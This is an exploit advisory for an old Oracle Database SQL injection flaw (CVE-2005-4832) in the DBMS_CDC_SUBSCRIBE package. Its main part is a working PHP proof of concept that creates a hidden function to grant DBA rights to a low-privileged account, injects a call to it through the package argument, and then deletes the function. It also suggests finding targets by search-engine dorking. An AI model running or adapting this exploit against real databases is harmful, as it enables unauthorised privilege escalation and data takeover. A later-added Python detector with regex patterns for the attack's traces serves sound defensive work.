Oracle Database Server 9.2.0.5 SQL Injection
=============================================================================================================================================
| # Title Oracle Database Server 9.2.0.5 SQL Injection
=============================================================================================================================================
| # Title : Oracle Database Server 9.2.0.5 SQL Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.oracle.com/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engines.
[+] Code Description: SQL injection vulnerability in the Oracle database SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package
(Related : https://packetstorm.news/files/id/180720/ ; linked CVE number: CVE-2005-4832).
[+] Save the code as poc.php.
[+] Set target : line 3 + 4 + 5 + 6 + 7
[+] Payload :
<?php
// Connection parameters for the target Oracle instance (set these before running)
$host = "localhost";           // database host
$port = "1521";                // Oracle listener port
$sid = "ORCL";                 // database SID
$user = "victim_user";         // low-privileged database account
$password = "victim_password"; // its password
try {
    $dsn = "oci:dbname=$host:$port/$sid;charset=UTF8";
    $conn = new PDO($dsn, $user, $password);
    $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    echo "[+] Connected to the database.\n";
    // Random name for the helper function
    $func_name = "h4ck" . rand(1000, 9999);
    // Invoker-rights function that grants DBA to the connecting user when it is evaluated
    $function = "
    CREATE OR REPLACE FUNCTION $func_name RETURN VARCHAR2
    AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION;
    BEGIN
        EXECUTE IMMEDIATE 'GRANT DBA TO $user';
        RETURN '';
    END;
    ";
    // Injection: the SQL literal '''||$func_name()||''' has the value '||$func_name()||',
    // which the package passes unescaped into its own dynamic SQL
    $injection = "
    BEGIN
        sys.dbms_cdc_subscribe.activate_subscription('''||$func_name()||''');
    END;
    ";
    // Remove the helper function afterwards
    $clean = "DROP FUNCTION $func_name";
    echo "[+] Creating helper function...\n";
    $conn->exec($function);
    try {
        echo "[+] Executing SQL injection...\n";
        $conn->exec($injection);
    } catch (Exception $e) {
        echo "[-] Injection failed: " . $e->getMessage() . "\n";
    } finally {
        echo "[+] Cleaning up...\n";
        $conn->exec($clean);
    }
    echo "[+] Done.\n";
} catch (PDOException $e) {
    die("[-] Connection or execution error: " . $e->getMessage() . "\n");
}
?>
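Detection note (added here, not part of the original advisory or the author's code): the technique above leaves two recognisable hallmarks in captured SQL text such as the SQL_TEXT column of an Oracle audit trail, an invoker-rights autonomous function that grants a role via EXECUTE IMMEDIATE, and a call into SYS.DBMS_CDC_SUBSCRIBE whose argument breaks out of the string literal with '||...||'. The checker below flags both; the sample statements and the function name h4ck1234 are constructed for the example.

```python
import re

# Hallmark 1: a DBMS_CDC_SUBSCRIBE call whose argument is a literal that opens
# with a quote and a concatenation ('''||...), i.e. the breakout used above.
CDC_INJECT = re.compile(
    r"dbms_cdc_subscribe\s*\.\s*\w+\s*\(.*?'''\s*\|\|",
    re.IGNORECASE | re.DOTALL)

# Hallmark 2: an invoker-rights function in an autonomous transaction that
# grants a role through dynamic SQL (the escalation stub the payload creates).
ESCALATION_FUNC = re.compile(
    r"CREATE\s+(OR\s+REPLACE\s+)?FUNCTION.*?AUTHID\s+CURRENT_USER.*?"
    r"PRAGMA\s+AUTONOMOUS_TRANSACTION.*?EXECUTE\s+IMMEDIATE\s+'GRANT\s+\w+\s+TO",
    re.IGNORECASE | re.DOTALL)


def classify(sql_text):
    """Return finding tags for one SQL/PL-SQL statement (empty list = nothing found)."""
    tags = []
    if CDC_INJECT.search(sql_text):
        tags.append("cdc_subscribe_injection")
    if ESCALATION_FUNC.search(sql_text):
        tags.append("privilege_escalation_function")
    return tags


def scan(statements):
    """Map statement index -> findings, keeping only statements with findings."""
    return {i: t for i, s in enumerate(statements) if (t := classify(s))}


# Constructed sample statements (not real audit data).
SAMPLES = [
    # legitimate call with a plain subscription name: must not be flagged
    "BEGIN sys.dbms_cdc_subscribe.activate_subscription('SALES_SUB'); END;",
    # escalation stub of the kind the advisory's payload creates
    "CREATE OR REPLACE FUNCTION h4ck1234 RETURN VARCHAR2 AUTHID CURRENT_USER IS "
    "PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; "
    "RETURN ''; END;",
    # the injection call splicing that function into the package argument
    "BEGIN sys.dbms_cdc_subscribe.activate_subscription('''||h4ck1234()||'''); END;",
    # cleanup: benign alone, but worth correlating with the two statements above
    "DROP FUNCTION h4ck1234",
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLES).items():
        print(idx, tags)
```

A CREATE FUNCTION hit followed shortly by a DBMS_CDC_SUBSCRIBE hit and a DROP FUNCTION from the same session is the sequence to alert on; the regexes cover this advisory's package and can be widened to other SYS packages.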
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================